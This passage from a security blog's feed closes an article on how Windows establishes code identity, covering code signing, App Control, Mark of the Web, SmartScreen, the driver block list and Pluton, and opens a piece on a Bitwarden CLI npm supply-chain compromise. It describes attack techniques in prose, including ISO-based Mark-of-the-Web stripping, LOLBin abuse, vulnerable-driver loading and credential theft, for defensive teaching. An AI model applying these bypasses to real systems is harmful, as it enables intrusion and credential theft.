&lt;td&gt;off&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;WDAC (Device Guard)&lt;/td&gt;
&lt;td&gt;Windows 10, 2015&lt;/td&gt;
&lt;td&gt;publisher / file attributes / hash&lt;/td&gt;
&lt;td&gt;full (with &lt;a href=&quot;https://paragmali.com/blog/the-windows-secure-kernel/&quot; rel=&quot;noopener&quot;&gt;HVCI&lt;/a&gt;)&lt;/td&gt;
&lt;td&gt;off&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;App Control for Business&lt;/td&gt;
&lt;td&gt;renamed 2023&lt;/td&gt;
&lt;td&gt;publisher / file attributes / hash&lt;/td&gt;
&lt;td&gt;full (with HVCI)&lt;/td&gt;
&lt;td&gt;off; on by default in S Mode and on Windows 11 SE&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The Code Integrity engine evaluates an App Control policy on every PE load -- user mode and kernel mode alike. With HVCI active, the policy lives behind the Hyper-V security boundary; even an NT-kernel-level attacker with arbitrary memory write cannot edit it without breaking out of the virtualization layer [@ms-appcontrol]. Deny rules always win; an explicit deny can never be undone by any number of allows on the same binary.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Author every App Control policy in audit mode for at least one full reference-image cycle before promoting to enforce. Audit mode logs every load that &lt;em&gt;would have been&lt;/em&gt; blocked, into the &lt;code&gt;Microsoft-Windows-CodeIntegrity/Operational&lt;/code&gt; event channel, without breaking anything. The pre-deployment failure rate of strict policies on real fleets is high enough that audit mode is not optional [@ms-appcontrol].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;App Control inherits the same structural ceiling Authenticode put in place. &lt;code&gt;Allow Signer = Microsoft Windows&lt;/code&gt; admits the entire LOLBins inventory -- &lt;code&gt;regsvr32&lt;/code&gt;, &lt;code&gt;mshta&lt;/code&gt;, &lt;code&gt;installutil&lt;/code&gt;, &lt;code&gt;rundll32&lt;/code&gt;, every signed-by-Microsoft binary an attacker can call to execute arbitrary content. &lt;code&gt;Allow Signer = ASUSTeK&lt;/code&gt; would have admitted ShadowHammer (operation 2018, disclosed 2019), every byte of which carried a valid ASUS production signature [@securelist-shadowhammer]. The publisher-rule model is the right primitive for managed endpoints, and the LOLBins / supply-chain-attack failure modes are the structural ceiling on what the primitive can prove.&lt;/p&gt;
&lt;p&gt;PKI-rooted publisher policy still trusts the publisher&apos;s key custody. When the key is stolen or the binary is signed but malicious, what does the operating system fall back on?&lt;/p&gt;
&lt;h2&gt;Reputation as identity: Mark of the Web and SmartScreen&lt;/h2&gt;
&lt;p&gt;A novel binary, signed by a freshly issued EV cert, has zero history. PKI says yes. Reputation says: I have never seen this before -- run it past the user.&lt;/p&gt;

An NTFS alternate data stream named `Zone.Identifier` written by browsers, mail clients, and other downloaders to record the trust zone of a downloaded file. The stream contains an INI-style `[ZoneTransfer]` block with `ZoneId=3` for files from the public internet, plus optional `ReferrerUrl=` and `HostUrl=` fields. The protocol is documented in the MS-FSCC reference [@ms-fscc-motw]. SmartScreen, Office Protected View, and the Attachment Execution Service all read MOTW to gate behaviour on origin.
&lt;p&gt;MOTW is not an Authenticode replacement. It is a parallel, &lt;em&gt;origin-based&lt;/em&gt; identity: the binary&apos;s provenance, encoded as data the file system carries with it, separate from any signature. Origin is the input to SmartScreen. SmartScreen submits a hash of the binary together with publisher metadata to a Microsoft-hosted reputation service; if the service has not seen the binary before, or has not seen enough downloads to be confident, the user gets the familiar &quot;Windows protected your PC&quot; prompt that requires an explicit More info / Run anyway click [@learn-smartscreen].&lt;/p&gt;
&lt;p&gt;The pipeline is parallel to Authenticode and App Control, not a successor. PKI says &quot;this signature chains to a real publisher.&quot; Reputation says &quot;this hash has been observed N times in the last 30 days, with prevalence trending up; the publisher account is six years old; M of the downloads were from machines later flagged for malware.&quot; None of those signals are derivable from a signature.The Defender machine-learning pipeline that powers SmartScreen reputation is the deeper version of the same idea -- already covered in &lt;em&gt;The Defender&apos;s Dilemma&lt;/em&gt; sibling article, which traces the twenty-year arc from Defender&apos;s 0.5/6 AV-TEST score to its 100% MITRE detection rate. The reputation primitive sits on top of that ML pipeline.&lt;/p&gt;
&lt;p&gt;The bypass surface is now well-known. Container formats (ISO, IMG, VHD, 7z) historically did not propagate MOTW to files extracted from them, because their on-disk representation does not preserve alternate data streams. Phishing campaigns adapted: send the attacker&apos;s &lt;code&gt;.exe&lt;/code&gt; inside an &lt;code&gt;.iso&lt;/code&gt;, the user mounts the &lt;code&gt;.iso&lt;/code&gt;, double-clicks the &lt;code&gt;.exe&lt;/code&gt;, and SmartScreen sees a binary with no MOTW and offers no warning.&lt;/p&gt;
&lt;p&gt;Microsoft&apos;s response combined fixes -- VHD and ISO MOTW propagation shipped in the December 2022 cumulative update for Windows 11 22H2, MOTW-aware extraction in OneDrive and the new Windows Archive APIs -- with two attack-surface-reduction rules that gate execution on prevalence and trust independently of MOTW [@learn-asr-reference]. The most useful is rule &lt;code&gt;01443614-cd74-433a-b99e-2ecdc07bfc25&lt;/code&gt;, &quot;Block executable files from running unless they meet a prevalence, age, or trusted list criterion.&quot;&lt;/p&gt;
&lt;p&gt;Office is the most consequential consumer of MOTW. A Word, Excel, or PowerPoint file carrying a &lt;code&gt;ZoneId=3&lt;/code&gt; Mark of the Web opens in Protected View: read-only, in a sandboxed renderer, with macros and active content disabled, until the user clicks &quot;Enable Editing&quot; on the message bar [@learn-protected-view].&lt;/p&gt;
&lt;p&gt;The 2022 wave of HTML-smuggling and ISO-borne malware that bypassed SmartScreen still tripped over Protected View at the document layer, and the post-2022 macro-blocked-by-default change extended the same MOTW-gated logic from container files to embedded VBA. Origin is now an input to two parallel pipelines: SmartScreen&apos;s reputation check on the executable, and Office&apos;s read-only-until-confirmed gate on the document.&lt;/p&gt;
&lt;p&gt;The full ASR rule GUIDs are in the Defender for Endpoint reference. Memorise none of them; pin the page.&lt;/p&gt;
&lt;p&gt;A useful way to read the layered system at this point: Authenticode answered &quot;who shipped it?&quot; KMCS answered &quot;is the kernel allowed to load it?&quot; PPL answered &quot;is this running process allowed to touch that one?&quot; AppContainer answered &quot;what application is this?&quot; App Control answered &quot;does the enterprise honour this publisher?&quot; MOTW and SmartScreen answer the question PKI cannot: &quot;have we seen this before, and from where?&quot; When PKI identity is necessary but not sufficient, reputation closes the gap -- statistically, never absolutely.&lt;/p&gt;
&lt;p&gt;PKI says yes; reputation says unknown. What does the operating system do when Microsoft itself says &lt;em&gt;no&lt;/em&gt; to a signature it just minted?&lt;/p&gt;
&lt;h2&gt;The breakthrough: signed is not trusted (Driver Block List, 2022)&lt;/h2&gt;
&lt;p&gt;December 8, 2021. Microsoft launches the Vulnerable and Malicious Driver Reporting Center [@msft-driver-reporting]. The blog post enumerates the failure shape that drove it: drivers that &quot;map arbitrary kernel, physical, or device memory to user mode,&quot; drivers that &quot;provide access to storage that bypass Windows access control,&quot; drivers whose IOCTLs let a local admin become an arbitrary kernel writer. Every one of those drivers was signed. Every one of those signatures was valid. Every one of those binaries was loadable on a default Windows install.&lt;/p&gt;
&lt;p&gt;By the Windows 11 22H2 update in September 2022, the Vulnerable Driver Block List was enabled by default [@msft-driver-blocklist]. The mechanism is a Microsoft-curated &lt;code&gt;SiPolicy.p7b&lt;/code&gt; (the same WDAC binary policy format), distributed through Windows Update and Defender intelligence updates, enforced by the Code Integrity engine -- with HVCI when present -- at every driver load. The published rules deny drivers by publisher, original filename, and hash. Critically, &lt;em&gt;the publisher&apos;s signature is still valid&lt;/em&gt;. The Block List is an explicit Microsoft veto layered on top of a working PKI verdict.&lt;/p&gt;

The blocklist included in this article ... usually contains a more complete set of known vulnerable drivers than the version in the OS and delivered by Windows Update. -- Microsoft Learn, *Microsoft recommended driver block rules* [@msft-driver-blocklist]
&lt;p&gt;That sentence, in Microsoft&apos;s own documentation, is the breakthrough. Microsoft is openly admitting that the version of the list shipped with the operating system trails the curated reference list. Curation is now a continuous, asynchronous activity, distinct from signing. The list ships on a quarterly cadence. New BYOVD drivers ship faster than that. The LOLDrivers community catalogue tracks hundreds of vulnerable drivers, many of which are not (yet) on Microsoft&apos;s list [@loldrivers].&lt;/p&gt;
&lt;p&gt;The Block List has a write-time companion. ASR rule &lt;code&gt;56a863a9-875e-4185-98a7-b882c64b5ce5&lt;/code&gt;, &quot;Block abuse of exploited vulnerable signed drivers,&quot; prevents &lt;em&gt;writing&lt;/em&gt; a known-vulnerable driver to disk in the first place [@learn-asr-reference]. The defence is layered: the Block List denies load; the ASR rule denies install; together they form a curtain across the BYOVD attack class. Together they do not close the BYOVD class -- the catalogue is a list, the threat is a set, and the gap is structural.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; A signature attests &lt;em&gt;who&lt;/em&gt;. A reputation score attests &lt;em&gt;unfamiliar versus seen-good&lt;/em&gt;. A block list attests &lt;em&gt;Microsoft has revoked trust at runtime, even though the signature still verifies&lt;/em&gt;. These are three distinct identity layers, and 2022 is the year all three were finally co-deployed by default on the same operating system.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; &quot;Curated identity at runtime&quot; is the conceptual breakthrough. &quot;Quarterly cadence&quot; is its operational ceiling. The Driver Block List is a list, the BYOVD threat is a set, and the gap between them is the open problem the next layer (Pluton + attestation + faster curation pipelines) is being asked to close.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The Driver Block List is the operational expression of a 25-year admission. After 1996&apos;s &quot;the new Microsoft Authenticode technology uniquely identifies the publisher,&quot; after Vista&apos;s &quot;we will refuse unsigned kernel drivers,&quot; after Windows 8.1&apos;s &quot;signer level mediates inter-process access,&quot; after Windows 10&apos;s &quot;App Control names policy in publisher vocabulary,&quot; Microsoft&apos;s December 2021 blog post said something different. It said: a signature is a publisher claim; trust is a different claim; we, Microsoft, will curate the second claim continuously, even when we ourselves issued the first one. Identity has become curated, not just verified.&lt;/p&gt;
&lt;p&gt;If even Microsoft can no longer trust a valid signature, where does trust ultimately have to live?&lt;/p&gt;
&lt;h2&gt;The 2026 stack and the hardware future&lt;/h2&gt;
&lt;p&gt;The eight primitives from the previous sections do not run in isolation. They compose. A modern Windows boot -- on a Pluton-equipped 2026 laptop running Windows 11 24H2 with HVCI on, App Control in enforce mode, Smart App Control on, and Microsoft Defender as the active anti-malware -- evaluates code identity continuously, top to bottom, from firmware through user mode.&lt;/p&gt;

flowchart LR
    A[&quot;UEFI Secure Boot&lt;br /&gt;firmware-rooted PKI&quot;] --&amp;gt; B[&quot;Pluton / TPM&lt;br /&gt;measured boot, PCRs&quot;]
    B --&amp;gt; C[&quot;KMCS&lt;br /&gt;chain-to-Microsoft&quot;]
    C --&amp;gt; D[&quot;Driver Block List&lt;br /&gt;Microsoft curated veto&quot;]
    D --&amp;gt; E[&quot;ELAM&lt;br /&gt;signer-level boot gate&quot;]
    E --&amp;gt; F[&quot;User-mode Authenticode&lt;br /&gt;publisher attribution&quot;]
    F --&amp;gt; G[&quot;PPL signer-level&lt;br /&gt;runtime ACL&quot;]
    G --&amp;gt; H[&quot;AppContainer + Package SID&lt;br /&gt;per-app principal&quot;]
    H --&amp;gt; I[&quot;App Control for Business&lt;br /&gt;publisher policy&quot;]
    I --&amp;gt; J[&quot;MOTW + SmartScreen&lt;br /&gt;origin + reputation&quot;]
    J --&amp;gt; K[&quot;Pluton attestation&lt;br /&gt;device-identity claim&quot;]
&lt;p&gt;The hardware root has shifted in five years. Pluton, announced on November 17, 2020 by Microsoft together with AMD, Intel, and Qualcomm, is a security processor integrated into the CPU die rather than a discrete TPM chip on the motherboard bus [@ms-pluton-blog]. AMD Ryzen 6000-series and later (including Ryzen AI), Intel Core Series 3, Core Ultra Series 3, and Core Ultra 200V, and Qualcomm Snapdragon 8cx Gen 3 and Snapdragon X Series ship Pluton as the on-die TPM. Pluton&apos;s firmware is updated through Windows Update -- not through OEM-controlled SPI flash patches -- and Microsoft started delivering Rust-based Pluton firmware on 2024 AMD and Intel systems, with broader rollout ongoing [@learn-pluton].&lt;/p&gt;
&lt;p&gt;The architectural significance is twofold. The trust root is no longer a chip with its bus exposed to a trace-and-sniff attacker. The firmware update path is now a Microsoft-controlled channel rather than thirty different OEM-controlled channels. The same hardware root is what &lt;a href=&quot;https://paragmali.com/blog/bitlocker-on-windows-architecture-attacks-and-the-limits-of-/&quot; rel=&quot;noopener&quot;&gt;BitLocker&lt;/a&gt; depends on when it seals the Volume Master Key to a &lt;a href=&quot;https://paragmali.com/blog/the-tpm-in-windows-one-primitive-twenty-five-years-and-the-c/&quot; rel=&quot;noopener&quot;&gt;measured boot&lt;/a&gt; chain via TPM PCRs [@ms-bitlocker]. On Pluton, those PCR measurements live in-die rather than on a bus-exposed chip, and the sibling article &lt;em&gt;BitLocker on Windows&lt;/em&gt; traces what that buys and what it does not.&lt;/p&gt;

Apple Gatekeeper plus Notarization is a single-CA model. All Mac binaries that pass Gatekeeper are notarized by Apple, scanning happens server-side, and Apple&apos;s own notary signature is the trust root [@apple-gatekeeper]. Linux IMA-Appraisal expresses code identity as a per-host keyring of cryptographic measurements; the kernel evaluates a load against a policy stored in the same keyring [@linux-ima]. Android APK Signature Scheme v3 binds the APK to a per-app signing key with an explicit proof-of-rotation chain that lets a publisher rotate keys without breaking the app&apos;s identity [@apksigning-v3]. Windows is the only one of the four that accepts third-party CAs in user mode while reserving Microsoft roots for the kernel. The cost of pluralism is exactly the long tail of failure modes this article enumerates; the benefit is the freedom every Windows ISV has used since 1996 to ship without asking Microsoft&apos;s permission.
&lt;p&gt;Then came July 19, 2024.&lt;/p&gt;
&lt;p&gt;CrowdStrike&apos;s Falcon kernel driver loaded a malformed Channel File 291 update that triggered an out-of-bounds memory read inside &lt;code&gt;csagent.sys&lt;/code&gt; and raised an invalid page fault [@msft-crowdstrike-best-practices], bug-checking roughly 8.5 million Windows endpoints simultaneously [@ms-crowdstrike-blog]. The driver was correctly Microsoft-signed through the Hardware Developer Center attestation pipeline. Every code-identity layer in the stack -- KMCS, the cross-cert, the EV cert, the attestation key, even the Block List -- said yes. The thing that went wrong was not identity. It was that an identity-blessed driver, running in kernel mode, can fail in ways that take entire continents offline.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The CrowdStrike outage proves that a correctly-signed, attested kernel driver is still a planet-scale liability if its placement is wrong. Identity is not the only dimension. Where in the privilege hierarchy a binary runs is itself a dimension that signing cannot capture.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Microsoft&apos;s reaction was structural. On September 12, 2024, David Weston published the recap of the September 10 WESES summit Microsoft had hosted with its endpoint-security partners, committing to provide &quot;additional security capabilities outside of kernel mode&quot; so that EDR vendors could run their detection logic in user mode [@weston-2024].&lt;/p&gt;
&lt;p&gt;On June 26, 2025, the Windows Resiliency Initiative announced a private preview of the new endpoint security platform, scheduled for July 2025 delivery to selected MVI partners: Bitdefender, CrowdStrike, ESET, and SentinelOne [@weston-2025]. CrowdStrike&apos;s representative was Alex Ionescu, now its Chief Technology Innovation Officer -- the same Alex Ionescu whose 2013 Breakpoint talk publicly mapped PPL signer levels. The arc had closed in twelve years.&lt;/p&gt;
&lt;p&gt;MVI 3.0 -- the Microsoft Virus Initiative, version three -- adds Safe Deployment Practices as a contractual condition: staged rollouts, deployment rings, monitoring. The same playbook Microsoft itself follows for Windows updates after the 2024 outage [@msft-crowdstrike-best-practices].&lt;/p&gt;
&lt;p&gt;The conceptual move is the same one PPL made in 2013, projected one layer higher. Then: identity becomes a runtime ACL between processes. Now: identity-bound &lt;em&gt;placement&lt;/em&gt; (kernel mode versus user mode) becomes a trust dimension co-equal with identity-bound &lt;em&gt;signing&lt;/em&gt;. The question is no longer &quot;is this driver signed and on the allow list?&quot; The question is &quot;should code with this identity be running in this context at all?&quot;&lt;/p&gt;
&lt;p&gt;If even attested, signed, blessed kernel code can fail catastrophically, what could code identity in principle ever prove -- and what is provably out of reach?&lt;/p&gt;
&lt;h2&gt;Theoretical bounds and open problems&lt;/h2&gt;
&lt;p&gt;Two papers from the 1980s bound everything that followed.&lt;/p&gt;
&lt;p&gt;Fred Cohen&apos;s 1984 paper at IFIP-Sec, republished in &lt;em&gt;Computers &amp;amp; Security&lt;/em&gt; in 1987, proved that perfect virus detection is undecidable: there is no algorithm that, given an arbitrary program, can decide whether it is a virus [@cohen-1986]. Reputation systems are necessarily heuristic. The &quot;first 1,000 downloads&quot; gap -- the window where SmartScreen has not yet seen enough of a new binary to be confident -- is structural, not a tuning problem. You cannot close it by waiting harder.&lt;/p&gt;
&lt;p&gt;Ken Thompson&apos;s 1984 ACM Turing Award lecture, &quot;Reflections on Trusting Trust,&quot; made a different point about a different layer [@thompson-trusting-trust]. Thompson exhibited a compiler that, when used to build itself, inserted a backdoor into a target program; when used to build the compiler, propagated the backdoor invisibly to the next-generation binary. Signing what the compiler emitted never proved the compiler was unmodified. SLSA Level 3+ provenance, reproducible builds, hermetic build environments [@slsa-spec] push the bound back one level. They do not eliminate it.&lt;/p&gt;
&lt;p&gt;A third bound is Authenticode-specific. Asynchronous revocation, the property that lets pre-revocation timestamped signatures continue to verify forever, is the reason Stuxnet&apos;s drivers loaded after Realtek&apos;s certificate was revoked, and the reason every other stolen-key compromise has a window of cryptographic legitimacy [@symantec-stuxnet]. Synchronous global revocation would invalidate large catalogs of legitimate, archived, signed software whose signing certs have since expired. There is no fix inside the design.&lt;/p&gt;
&lt;p&gt;Pulled together, these bounds explain the persistent gap. Stolen-but-not-yet-revoked publisher keys are the same failure mode replayed three times in sixteen years: Stuxnet (2010, Realtek and JMicron), ASUS ShadowHammer (operation 2018, disclosed 2019, ASUSTeK production key), &lt;a href=&quot;https://paragmali.com/blog/when-your-password-manager-attacks-you-inside-the-bitwarden-/&quot; rel=&quot;noopener&quot;&gt;Bitwarden CLI&lt;/a&gt; (2026, npm publishing credential). The Pluton firmware-update pipeline is the most credible architectural response yet -- a Microsoft-controlled key-rotation channel that does not depend on OEM-side custody -- but it does not eliminate the class. It compresses the response window.&lt;/p&gt;
&lt;p&gt;The other open problem is identity for non-PE artifacts. The Authenticode hash and the WDAC publisher rule were designed for Portable Executable files; everything else gets uneven coverage. PowerShell &lt;code&gt;.ps1&lt;/code&gt; scripts can be signed and gated through Constrained Language Mode, which the runtime enters automatically when an AppLocker or App Control policy is in force [@learn-clm]. .NET assemblies have strong-name signatures, separate from Authenticode and explicitly not a security boundary; Microsoft&apos;s own documentation warns &quot;do not rely on strong names for security&quot; [@learn-strong-name].&lt;/p&gt;
&lt;p&gt;JIT-compiled code -- the most common shape of &quot;code&quot; in 2026 -- is signed only insofar as the JIT host is signed. The JIT itself produces unsigned bytes. Container images, WSL guests, AI model files, and (now) agent prompts all live outside the Authenticode universe entirely. Each is its own substrate, with its own emerging signing scheme, and the unification has not happened.&lt;/p&gt;
&lt;p&gt;$$\text{trust}_{2026}(\text{binary}) = \text{publisher}(\text{binary}) \land \text{provenance}(\text{build}) \land \text{placement}(\text{runtime}) \land \text{reputation}(\text{telemetry}) \land \neg \text{revoked}(\text{Microsoft})$$&lt;/p&gt;
&lt;p&gt;That conjunction is the 2026 verdict. None of its terms are sufficient on their own. Each was forced into existence by a failure of the term before. The arc from &quot;who launched this thread?&quot; in 1993 to that conjunction in 2026 is what thirty-three years of forced moves produced.&lt;/p&gt;
&lt;p&gt;What does the layered system look like in practice on a 2026 endpoint -- and what should an admin actually do?&lt;/p&gt;
&lt;h2&gt;Practical guide&lt;/h2&gt;
&lt;p&gt;Six concrete recommendations for a 2026 Windows fleet, each tied to a primary Microsoft Learn or MSRC source.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; On Windows 11 22H2 and later it is enabled by default. On Windows 10, Server, and downlevel Windows 11 builds, enable it explicitly through Settings &amp;gt; Privacy &amp;amp; security &amp;gt; Windows Security &amp;gt; Device security &amp;gt; Core isolation &amp;gt; Microsoft Vulnerable Driver Blocklist. HVCI must be on for full enforcement [@msft-driver-blocklist].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The published Microsoft baseline policies (&lt;code&gt;Default Windows&lt;/code&gt;, &lt;code&gt;Allow Microsoft&lt;/code&gt;, the Windows S Mode policy) are the right starting points. Run any custom policy in audit mode for a full reference-image cycle, mine the &lt;code&gt;Microsoft-Windows-CodeIntegrity/Operational&lt;/code&gt; event log for blocked loads, then promote to enforce. Pair with HVCI so the policy lives behind the secure-kernel boundary [@ms-appcontrol]. Deploy through Microsoft Intune (or your MDM of choice), Configuration Manager, or Group Policy -- App Control policy distribution is a first-class managed-endpoint scenario rather than a per-machine hand edit [@learn-appcontrol-deployment].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; On Secure Boot systems the value is mirrored into a UEFI variable, so registry-only attackers cannot turn it off. Verify with &lt;code&gt;Get-ItemProperty -Path &apos;HKLM:\SYSTEM\CurrentControlSet\Control\Lsa&apos; -Name RunAsPPL&lt;/code&gt; and the corresponding &lt;code&gt;RunAsPPLBoot&lt;/code&gt; UEFI variable [@itm4n-runasppl].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; SmartScreen alone is bypassed by container-format MOTW stripping. Pair it with ASR rule &lt;code&gt;01443614-cd74-433a-b99e-2ecdc07bfc25&lt;/code&gt;, which gates execution on prevalence, age, or a trusted list, independently of MOTW [@learn-smartscreen] [@learn-asr-reference].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The Package SID is a free identity for any internal app you ship as MSIX. ACL sensitive resources to it, declare capabilities explicitly in the manifest, and let the AppContainer SID enforce the ACL at the kernel boundary [@ms-package-identity] [@ms-msix].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Treat your code-signing key like a credential, not a build artifact. Rotate the EV cert, revoke the old one, notify customers, and -- if the binary already shipped -- request the offending hash on the Driver Block List or the ASR rule [@msft-driver-reporting]. The Bitwarden CLI 2026 incident took 93 minutes from release to containment, with rollback continuing for several hours afterward [@bitwarden-statement]; have the playbook ready before you need it.&lt;/p&gt;
&lt;/blockquote&gt;

```js
function loadDecision({ signed, signerLevel, motwed, onBlockList, allowedByAppControl, smartScreenVerdict }) {
  if (onBlockList) return &apos;BLOCK -- Microsoft veto, signature ignored&apos;;
  if (signed === false &amp;amp;&amp;amp; allowedByAppControl === false) return &apos;BLOCK -- unsigned, App Control denies&apos;;
  if (signerLevel === &apos;WinTcb&apos; || signerLevel === &apos;WinSystem&apos;) return &apos;LOAD -- protected process&apos;;
  if (allowedByAppControl === false) return &apos;BLOCK -- App Control deny&apos;;
  if (motwed &amp;amp;&amp;amp; smartScreenVerdict === &apos;unknown&apos;) return &apos;WARN -- SmartScreen, user gate&apos;;
  if (motwed &amp;amp;&amp;amp; smartScreenVerdict === &apos;malicious&apos;) return &apos;BLOCK -- SmartScreen&apos;;
  return &apos;LOAD&apos;;
}
console.log(loadDecision({
  signed: true, signerLevel: &apos;Authenticode&apos;,
  motwed: true, onBlockList: false,
  allowedByAppControl: true, smartScreenVerdict: &apos;good&apos;,
}));
```
The decision tree is the practical mental model. Every branch of it is the consequence of one of the failures this article tracks.

No. A signature attests *publisher identity* and *binary integrity*. It does not attest safety. Microsoft trust is a separate, runtime claim expressed through the Driver Block List, App Control policies, and Defender reputation -- evaluated continuously, even on signatures Microsoft itself once minted [@msft-driver-blocklist].

Extended Validation Authenticode signing vets organisational identity through an audited issuance process and mandates that the private key live in a hardware security module; the publisher&apos;s signature is the trust root. Attestation signing is Microsoft&apos;s lighter-weight pipeline for kernel drivers: the publisher submits an EV-signed binary to the Hardware Developer Center, Microsoft re-signs with its own attestation key, and the result is delivered back. Attestation-signed drivers are not WHQL tested and are not distributed via retail Windows Update [@learn-driver-signing-offerings] [@ms-attestation-signing].

MOTW plus low prevalence. SmartScreen sees a binary it has not observed enough times in the global telemetry to be confident, on a file marked as having been downloaded from the internet. Sign the binary with an EV certificate, accumulate downloads on a stable hash, and the warning fades. Internal binaries can have MOTW stripped at deployment time if your distribution channel is itself trusted [@learn-smartscreen].

No. AppLocker is the Windows 7-era policy mechanism with rules in path/publisher/hash form, no kernel coverage, and no virtualization-based protection of the policy itself. App Control for Business -- formerly Windows Defender Application Control -- is the publisher-rule Code Integrity policy mechanism with HVCI enforcement at the kernel boundary. Microsoft recommends App Control for new deployments and keeps AppLocker for compatibility [@ms-applocker] [@ms-appcontrol].

LSASS is running as a Protected Process Light at the `Lsa` signer level. Signer-level gating sits *above* the token DACL check. Even a SYSTEM-token caller with `SeDebugPrivilege` gets a process handle with `PROCESS_VM_READ` and `PROCESS_VM_WRITE` stripped, because PPL strips access masks before the DACL evaluation. Disable LSA Protection (`RunAsPPL=0`) on a test machine and the same call succeeds [@itm4n-runasppl] [@scrt-ppl-bypass].

Only if the publisher&apos;s signing-key custody and build pipeline are themselves uncompromised. Stuxnet (stolen Realtek and JMicron keys, 2010), ASUS ShadowHammer (compromised production signing pipeline, operation 2018 / disclosed 2019), and the Bitwarden CLI npm incident (2026) all produced cryptographically valid signatures on attacker-controlled bytes [@symantec-stuxnet] [@securelist-shadowhammer] [@bitwarden-statement]. SLSA-level build provenance and Pluton-rooted attestation are the architectural responses; neither is yet universally deployed [@slsa-spec] [@learn-pluton].
&lt;h2&gt;Where this is going&lt;/h2&gt;
&lt;p&gt;Pluton-rooted device attestation, MVI 3.0&apos;s user-mode security platform, SLSA build provenance, and the post-CrowdStrike push to make placement a first-class identity attribute are all in motion in 2026 [@weston-2025] [@slsa-spec]. The follow-on articles -- Driver Block List in production, App Control with HVCI on real fleets, Secure Boot internals, the Pluton firmware-update channel -- are the operational complement to the conceptual story this article has told.&lt;/p&gt;
&lt;p&gt;The arc that began with Windows NT 3.1 having no answer to &quot;who is this code?&quot; now has eight overlapping answers, each insufficient on its own. Identity in 2026 is a multi-layered claim about a binary&apos;s publisher, its build provenance, its runtime placement, and its reputation, evaluated continuously while the code is running. The arc from 1993&apos;s &quot;who launched this thread?&quot; to 2026&apos;s &quot;is this signed binary, in this placement, with this build provenance, on Microsoft&apos;s curated honour list, today, on this hardware-attested device?&quot; is the answer thirty-three years of forced moves produced -- and the question the next thirty-three years will keep asking, because none of the bounds Cohen and Thompson proved have moved.&lt;/p&gt;
&lt;p&gt;&amp;lt;StudyGuide slug=&quot;app-identity-in-windows&quot; keyTerms={[
  { term: &quot;Authenticode&quot;, definition: &quot;PE-attached PKCS#7 SignedData that names the publisher and detects tampering. Names the publisher, not the code.&quot; },
  { term: &quot;Kernel-Mode Code Signing (KMCS)&quot;, definition: &quot;Vista x64 policy that refuses to load unsigned kernel drivers; chain-to-Microsoft requirement post-2015.&quot; },
  { term: &quot;Protected Process Light (PPL)&quot;, definition: &quot;Windows 8.1 attribute that mediates inter-process access by signer level; LSASS-as-PPL defeats user-mode credential dumpers.&quot; },
  { term: &quot;Package SID&quot;, definition: &quot;Cryptographic application identity (S-1-15-2-...) derived from the MSIX manifest publisher; first-class principal in ACLs and capability checks.&quot; },
  { term: &quot;App Control for Business&quot;, definition: &quot;Publisher-rule Code Integrity policy formerly called WDAC; enforced by HVCI; ships in S Mode and Windows 11 SE by default.&quot; },
  { term: &quot;Mark of the Web (MOTW)&quot;, definition: &quot;Zone.Identifier alternate data stream that records a file&apos;s origin; input to SmartScreen reputation.&quot; },
  { term: &quot;Vulnerable Driver Block List&quot;, definition: &quot;Microsoft-curated WDAC-format deny list shipped quarterly; default-on since Windows 11 22H2; the operational expression of &apos;signed != trusted&apos;.&quot; },
  { term: &quot;Pluton&quot;, definition: &quot;On-die Microsoft security processor in AMD Ryzen 6000+, Intel Core Ultra 200V, and Qualcomm 8cx Gen 3; firmware updated through Windows Update.&quot; }
]} /&amp;gt;&lt;/p&gt;
</content:encoded><category>windows-security</category><category>authenticode</category><category>code-signing</category><category>protected-process-light</category><category>appcontainer</category><category>app-control</category><category>driver-blocklist</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>When Your Password Manager Attacks You: Inside the Bitwarden CLI Supply Chain Compromise</title><link>https://paragmali.com/blog/when-your-password-manager-attacks-you-inside-the-bitwarden-/</link><guid isPermaLink="true">https://paragmali.com/blog/when-your-password-manager-attacks-you-inside-the-bitwarden-/</guid><description>How the @bitwarden/cli npm package was hijacked for 93 minutes on April 22, 2026, subverting trusted publishing to steal AWS, GitHub, and SSH credentials from 334 installs.</description><pubDate>Fri, 01 May 2026 00:00:00 GMT</pubDate><content:encoded>
**On April 22, 2026, the official @bitwarden/cli npm package was hijacked for 93 minutes.** Version 2026.4.0 stole AWS, Azure, GCP, GitHub, and npm tokens plus SSH keys from approximately 334 installs. The payload encrypted stolen data with AES-256-GCM and exfiltrated it to a domain impersonating Checkmarx. The attack -- attributed to threat actor TeamPCP -- was the first to subvert npm&apos;s trusted publishing mechanism by compromising the CI/CD pipeline itself. It represents the third iteration of the Shai-Hulud self-propagating npm worm. Pin your GitHub Actions by SHA, verify provenance, and rotate all credentials if affected.
&lt;h2&gt;The 93-Minute Breach&lt;/h2&gt;
